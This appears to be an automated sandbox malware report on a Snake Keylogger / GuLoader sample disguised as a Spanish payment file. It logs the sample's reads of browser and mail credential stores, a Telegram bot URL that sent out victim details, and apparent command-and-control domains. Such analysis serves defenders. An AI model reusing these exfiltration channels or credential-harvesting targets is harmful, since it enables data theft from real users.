            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exeCode function: 0_2_00405D51 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405D51

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000004.00000002.4128839595.0000000020091000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7808, type: MEMORYSTR
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
            Source: Yara matchFile source: 00000004.00000002.4128839595.000000002019D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7808, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000004.00000002.4128839595.0000000020091000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7808, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            2
            Obfuscated Files or Information
            1
            OS Credential Dumping
            2
            File and Directory Discovery
            Remote Services1
            Archive Collected Data
            1
            Web Service
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts2
            PowerShell
            Boot or Logon Initialization Scripts1
            Access Token Manipulation
            1
            Software Packing
            LSASS Memory14
            System Information Discovery
            Remote Desktop Protocol1
            Data from Local System
            3
            Ingress Tool Transfer
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)311
            Process Injection
            1
            DLL Side-Loading
            Security Account Manager11
            Security Software Discovery
            SMB/Windows Admin Shares1
            Email Collection
            21
            Encrypted Channel
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Masquerading
            NTDS1
            Process Discovery
            Distributed Component Object Model1
            Clipboard Data
            3
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script31
            Virtualization/Sandbox Evasion
            LSA Secrets31
            Virtualization/Sandbox Evasion
            SSHKeylogging14
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Access Token Manipulation
            Cached Domain Credentials1
            Application Window Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items311
            Process Injection
            DCSync1
            System Network Configuration Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1538463 Sample: PAGO FRAS. AGOSTO 2024..exe Startdate: 21/10/2024 Architecture: WINDOWS Score: 100 34 reallyfreegeoip.org 2->34 36 api.telegram.org 2->36 38 4 other IPs or domains 2->38 44 Found malware configuration 2->44 46 Multi AV Scanner detection for submitted file 2->46 48 Yara detected GuLoader 2->48 54 4 other signatures 2->54 8 PAGO FRAS. AGOSTO 2024..exe 26 2->8         started        signatures3 50 Tries to detect the country of the analysis system (by using the IP) 34->50 52 Uses the Telegram API (likely for C&C communication) 36->52 process4 file5 22 C:\Users\user\AppData\...\Vandrerlav.syn, ASCII 8->22 dropped 56 Suspicious powershell command line found 8->56 12 powershell.exe 28 8->12         started        signatures6 process7 file8 24 C:\Users\user\...\PAGO FRAS. AGOSTO 2024..exe, PE32 12->24 dropped 26 PAGO FRAS. AGOSTO ...exe:Zone.Identifier, ASCII 12->26 dropped 58 Early bird code injection technique detected 12->58 60 Writes to foreign memory regions 12->60 62 Found suspicious powershell code related to unpacking or dynamic code loading 12->62 64 3 other signatures 12->64 16 msiexec.exe 15 8 12->16         started        20 conhost.exe 12->20         started        signatures9 process10 dnsIp11 28 api.telegram.org 149.154.167.220, 443, 62527 TELEGRAMRU United Kingdom 16->28 30 reallyfreegeoip.org 188.114.97.3, 443, 62511, 62512 CLOUDFLARENETUS European Union 16->30 32 3 other IPs or domains 16->32 40 Tries to steal Mail credentials (via file / registry access) 16->40 42 Tries to harvest and steal browser information (history, passwords, etc) 16->42 signatures12

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            PAGO FRAS. AGOSTO 2024..exe21%VirustotalBrowse
            PAGO FRAS. AGOSTO 2024..exe11%ReversingLabsWin32.Spyware.Snakekeylogger
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Svarbrevets\PAGO FRAS. AGOSTO 2024..exe11%ReversingLabsWin32.Spyware.Snakekeylogger
            No Antivirus matches
            SourceDetectionScannerLabelLink
            reallyfreegeoip.org0%VirustotalBrowse
            drive.usercontent.google.com1%VirustotalBrowse
            drive.google.com0%VirustotalBrowse
            api.telegram.org2%VirustotalBrowse
            SourceDetectionScannerLabelLink
            http://nuget.org/NuGet.exe0%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
            https://contoso.com/License0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            http://checkip.dyndns.org0%URL Reputationsafe
            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK20160%URL Reputationsafe
            http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e170%URL Reputationsafe
            http://checkip.dyndns.org/0%URL Reputationsafe
            http://nsis.sf.net/NSIS_Error0%URL Reputationsafe
            https://aka.ms/pscore6lB0%URL Reputationsafe
            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install0%URL Reputationsafe
            https://contoso.com/0%URL Reputationsafe
            https://nuget.org/nuget.exe0%URL Reputationsafe
            https://reallyfreegeoip.org0%URL Reputationsafe
            https://apis.google.com0%URL Reputationsafe
            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            https://reallyfreegeoip.org/xml/0%URL Reputationsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            142.250.185.206
            truefalseunknown
            drive.usercontent.google.com
            216.58.206.33
            truefalseunknown
            reallyfreegeoip.org
            188.114.97.3
            truetrueunknown
            api.telegram.org
            149.154.167.220
            truetrueunknown
            checkip.dyndns.com
            158.101.44.242
            truefalse
              unknown
              checkip.dyndns.org
              unknown
              unknowntrue
                unknown
                NameMaliciousAntivirus DetectionReputation
                http://checkip.dyndns.org/false
                • URL Reputation: safe
                unknown
                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:138727%0D%0ADate%20and%20Time:%2021/10/2024%20/%2019:07:34%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20138727%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                  unknown
                  https://reallyfreegeoip.org/xml/155.94.241.186false
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    https://www.office.com/msiexec.exe, 00000004.00000002.4128839595.0000000020287000.00000004.00000800.00020000.00000000.sdmpfalse
                      unknown
                      http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1860973910.00000000060FC000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://api.telegram.orgmsiexec.exe, 00000004.00000002.4128839595.0000000020178000.00000004.00000800.00020000.00000000.sdmpfalse
                        unknown
                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.1858126944.00000000051E6000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://api.telegram.org/botmsiexec.exe, 00000004.00000002.4128839595.0000000020178000.00000004.00000800.00020000.00000000.sdmpfalse
                          unknown
                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.1858126944.00000000051E6000.00000004.00000800.00020000.00000000.sdmpfalse
                            unknown
                            https://contoso.com/Licensepowershell.exe, 00000001.00000002.1860973910.00000000060FC000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://www.office.com/lBmsiexec.exe, 00000004.00000002.4128839595.0000000020282000.00000004.00000800.00020000.00000000.sdmpfalse
                              unknown
                              https://contoso.com/Iconpowershell.exe, 00000001.00000002.1860973910.00000000060FC000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://drive.usercontent.google.com/msiexec.exe, 00000004.00000002.4115622500.0000000000876000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.1969721891.0000000000876000.00000004.00000020.00020000.00000000.sdmpfalse
                                unknown
                                http://checkip.dyndns.orgmsiexec.exe, 00000004.00000002.4128839595.0000000020091000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016msiexec.exe, 00000004.00000002.4128839595.000000002019D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.0000000021361000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.0000000021313000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.00000000211BD000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.000000002116F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.0000000021436000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.00000000211E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://nsis.sf.net/NSIS_ErrorErrorPAGO FRAS. AGOSTO 2024..exe, PAGO FRAS. AGOSTO 2024..exe.1.drfalse
                                • URL Reputation: safe
                                unknown
                                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17msiexec.exe, 00000004.00000002.4128839595.000000002019D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.0000000021361000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.0000000021313000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.00000000211BD000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.000000002116F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.0000000021436000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.00000000211E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://api.telegram.org/bot/sendMessage?chat_id=&text=msiexec.exe, 00000004.00000002.4128839595.0000000020178000.00000004.00000800.00020000.00000000.sdmpfalse
                                  unknown
                                  https://chrome.google.com/webstore?hl=enmsiexec.exe, 00000004.00000002.4128839595.0000000020256000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4128839595.0000000020247000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4128839595.0000000020287000.00000004.00000800.00020000.00000000.sdmpfalse
                                    unknown
                                    https://reallyfreegeoip.org/xml/155.94.241.186$msiexec.exe, 00000004.00000002.4128839595.000000002010B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4128839595.0000000020178000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4128839595.0000000020150000.00000004.00000800.00020000.00000000.sdmpfalse
                                      unknown
                                      http://varders.kozow.com:8081msiexec.exe, 00000004.00000002.4128839595.0000000020091000.00000004.00000800.00020000.00000000.sdmpfalse
                                        unknown
                                        https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.1858126944.00000000051E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                          unknown
                                          http://crl.mipowershell.exe, 00000001.00000002.1866731311.0000000007837000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            http://aborters.duckdns.org:8081msiexec.exe, 00000004.00000002.4128839595.0000000020091000.00000004.00000800.00020000.00000000.sdmpfalse
                                              unknown
                                              https://www.google.commsiexec.exe, 00000004.00000003.1925140710.0000000000876000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.1923872826.0000000000876000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                http://nsis.sf.net/NSIS_ErrorPAGO FRAS. AGOSTO 2024..exe, PAGO FRAS. AGOSTO 2024..exe.1.drfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://aka.ms/pscore6lBpowershell.exe, 00000001.00000002.1858126944.0000000005091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://drive.google.com/msiexec.exe, 00000004.00000002.4115622500.00000000007EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  unknown
                                                  http://anotherarmy.dns.army:8081msiexec.exe, 00000004.00000002.4128839595.0000000020091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    unknown
                                                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Installmsiexec.exe, 00000004.00000002.4129881517.00000000212EE000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.00000000211BF000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.0000000021319000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.0000000021412000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.000000002114A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.0000000021175000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://contoso.com/powershell.exe, 00000001.00000002.1860973910.00000000060FC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1860973910.00000000060FC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://chrome.google.com/webstore?hl=enlBmsiexec.exe, 00000004.00000002.4128839595.0000000020251000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      unknown
                                                      https://reallyfreegeoip.orgmsiexec.exe, 00000004.00000002.4128839595.00000000200E0000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4128839595.0000000020178000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4128839595.0000000020150000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:138727%0D%0ADate%20amsiexec.exe, 00000004.00000002.4128839595.0000000020178000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        unknown
                                                        https://apis.google.commsiexec.exe, 00000004.00000003.1925140710.0000000000876000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.1923872826.0000000000876000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplesmsiexec.exe, 00000004.00000002.4129881517.00000000212EE000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.00000000211BF000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.0000000021319000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.0000000021412000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.000000002114A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.0000000021175000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1858126944.0000000005091000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4128839595.0000000020091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://reallyfreegeoip.org/xml/msiexec.exe, 00000004.00000002.4128839595.00000000200E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs
                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        149.154.167.220
                                                        api.telegram.orgUnited Kingdom
                                                        62041TELEGRAMRUtrue
                                                        142.250.185.206
                                                        drive.google.comUnited States
                                                        15169GOOGLEUSfalse
                                                        188.114.97.3
                                                        reallyfreegeoip.orgEuropean Union
                                                        13335CLOUDFLARENETUStrue
                                                        216.58.206.33
                                                        drive.usercontent.google.comUnited States
                                                        15169GOOGLEUSfalse
                                                        158.101.44.242
                                                        checkip.dyndns.comUnited States
                                                        31898ORACLE-BMC-31898USfalse
                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1538463
                                                        Start date and time:2024-10-21 11:02:46 +02:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 8m 33s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:8
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:PAGO FRAS. AGOSTO 2024..exe
                                                        Detection:MAL
                                                        Classification:mal100.troj.spyw.evad.winEXE@6/14@5/5
                                                        EGA Information:
                                                        • Successful, ratio: 66.7%
                                                        HCA Information:
                                                        • Successful, ratio: 95%
                                                        • Number of executed functions: 113
                                                        • Number of non-executed functions: 94
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .exe
                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                        • Execution Graph export aborted for target powershell.exe, PID 7432 because it is empty
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                        TimeTypeDescription
                                                        05:03:37API Interceptor37x Sleep call for process: powershell.exe modified
                                                        05:04:09API Interceptor9630444x Sleep call for process: msiexec.exe modified
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        149.154.167.220RFQ-KTE-07102024.pdf.scrGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          rRFQ24201007_pdf.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            PROFOMA INVOICE 90021144577.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              routcrying.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                mnobizx.com.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  mnobizx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    rcota____oRFQNO-N__merodopedido106673.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      SecuriteInfo.com.Win64.Malware-gen.32485.11504.exeGet hashmaliciousPython Stealer, BraodoBrowse
                                                                        Wuerth_factura_4052073226..exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                          KIDy5J5su4.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            188.114.97.3http://comodozeropoint.com/updates/1736162964/N1/Team.exeGet hashmaliciousUnknownBrowse
                                                                            • comodozeropoint.com/updates/1736162964/N1/Team.exe
                                                                            SecuriteInfo.com.Win32.MalwareX-gen.14607.6011.exeGet hashmaliciousUnknownBrowse
                                                                            • servicetelemetryserver.shop/api/index.php
                                                                            SecuriteInfo.com.Trojan.DownLoader47.45523.5497.16574.exeGet hashmaliciousUnknownBrowse
                                                                            • servicetelemetryserver.shop/api/index.php
                                                                            SecuriteInfo.com.Trojan.DownLoader47.45523.5497.16574.exeGet hashmaliciousUnknownBrowse
                                                                            • servicetelemetryserver.shop/api/index.php
                                                                            ZP4KZDHVHWZZ2DC13DMX.exeGet hashmaliciousAmadeyBrowse
                                                                            • tipinfodownload-soft1.com/g9jvjfd73/index.php
                                                                            aQdB62N7SB.elfGet hashmaliciousShikitega, XmrigBrowse
                                                                            • main.dsn.ovh/dns/loadbit
                                                                            PO#071024.exeGet hashmaliciousFormBookBrowse
                                                                            • www.freedietbuilder.online/nnla/
                                                                            NOXGUARD AUS 40 UREA__912001_NOR_EN - MSDS.exeGet hashmaliciousUnknownBrowse
                                                                            • www.ergeneescortg.xyz/guou/
                                                                            QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                            • filetransfer.io/data-package/DyuQ5y15/download
                                                                            Payment.cmdGet hashmaliciousAzorult, DBatLoaderBrowse
                                                                            • dsye.shop/DS341/index.php
                                                                            158.101.44.242#U304a#U898b#U7a4d#U308a#U4f9d#U983c.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                            • checkip.dyndns.org/
                                                                            RFQ-KTE-07102024.pdf.scrGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • checkip.dyndns.org/
                                                                            Supplier RFQ ID 365242213q___________________________pdf.exeGet hashmaliciousSnake Keylogger, XRedBrowse
                                                                            • checkip.dyndns.org/
                                                                            RFQ-KTE-07102024.pdf.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • checkip.dyndns.org/
                                                                            Request for Q uotation.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • checkip.dyndns.org/
                                                                            BON 521264.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                            • checkip.dyndns.org/
                                                                            ACCOUNTXSTATEMENT.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                            • checkip.dyndns.org/
                                                                            PO-94858.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                            • checkip.dyndns.org/
                                                                            uYP4XsZFKS.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • checkip.dyndns.org/
                                                                            Kontodetails.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                            • checkip.dyndns.org/
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            reallyfreegeoip.org#U304a#U898b#U7a4d#U308a#U4f9d#U983c.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                            • 188.114.97.3
                                                                            RFQ-KTE-07102024.pdf.scrGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 188.114.96.3
                                                                            rRFQ24201007_pdf.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 188.114.96.3
                                                                            PROFOMA INVOICE 90021144577.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 188.114.97.3
                                                                            routcrying.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                            • 188.114.97.3
                                                                            mnobizx.com.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 188.114.96.3
                                                                            mnobizx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 188.114.96.3
                                                                            rcota____oRFQNO-N__merodopedido106673.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 188.114.96.3
                                                                            Wuerth_factura_4052073226..exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                            • 188.114.96.3
                                                                            NEW CUSTOMER ORDER.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                            • 188.114.97.3
                                                                            checkip.dyndns.com#U304a#U898b#U7a4d#U308a#U4f9d#U983c.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                            • 158.101.44.242
                                                                            RFQ-KTE-07102024.pdf.scrGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 158.101.44.242
                                                                            rRFQ24201007_pdf.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 132.226.247.73
                                                                            PROFOMA INVOICE 90021144577.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 193.122.6.168
                                                                            routcrying.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                            • 193.122.130.0
                                                                            mnobizx.com.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 132.226.8.169
                                                                            mnobizx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 158.101.44.242
                                                                            rcota____oRFQNO-N__merodopedido106673.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 193.122.130.0
                                                                            Wuerth_factura_4052073226..exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                            • 132.226.8.169
                                                                            NEW CUSTOMER ORDER.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                            • 193.122.6.168
                                                                            api.telegram.orgRFQ-KTE-07102024.pdf.scrGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            rRFQ24201007_pdf.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            PROFOMA INVOICE 90021144577.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            routcrying.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            mnobizx.com.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            mnobizx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            rcota____oRFQNO-N__merodopedido106673.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            SecuriteInfo.com.Win64.Malware-gen.32485.11504.exeGet hashmaliciousPython Stealer, BraodoBrowse
                                                                            • 149.154.167.220
                                                                            Wuerth_factura_4052073226..exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                            • 149.154.167.220
